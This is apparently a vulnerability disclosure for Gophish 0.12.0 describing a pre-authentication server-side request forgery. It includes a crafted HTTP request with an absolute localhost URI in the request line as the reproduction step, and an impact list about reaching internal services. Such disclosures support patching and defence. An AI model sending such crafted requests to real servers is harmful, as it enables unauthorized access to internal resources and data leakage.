Pre-Auth Full Read SSRF in URI

[ratel-xx]

What version of Gophish are you using?:
0.12.0

Brief description of the issue:
A Server-Side Request Forgery (SSRF) vulnerability has been identified in Gophish that allows attackers to send crafted requests from the vulnerable server. This issue is particularly critical as it does not require prior authentication, enabling the attacker to gain unauthorized access to internal resources and potentially leak sensitive information.

Please provide as many steps as you can to reproduce the problem:

• Step 1 - Send any request (GET, POST, etc.) with the hostname and protocol added to the request URI.

GET https://localhost:3333/login HTTP/1.1
Host: phish-domain.exm.com
Referer: https://phish-domain.exm.com
Accept-Encoding: gzip, deflate, br
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6,zh;q=0.5
Connection: keep-alive

• Step 2 - Full Read SSRF. Expected Malicious Response:
  

Impact:

• Unauthorized access to sensitive internal data.
• Potential pivoting to execute more serious attacks within the network architecture.
• Identifying and interaction with internal services which could be leveraged for further attacks.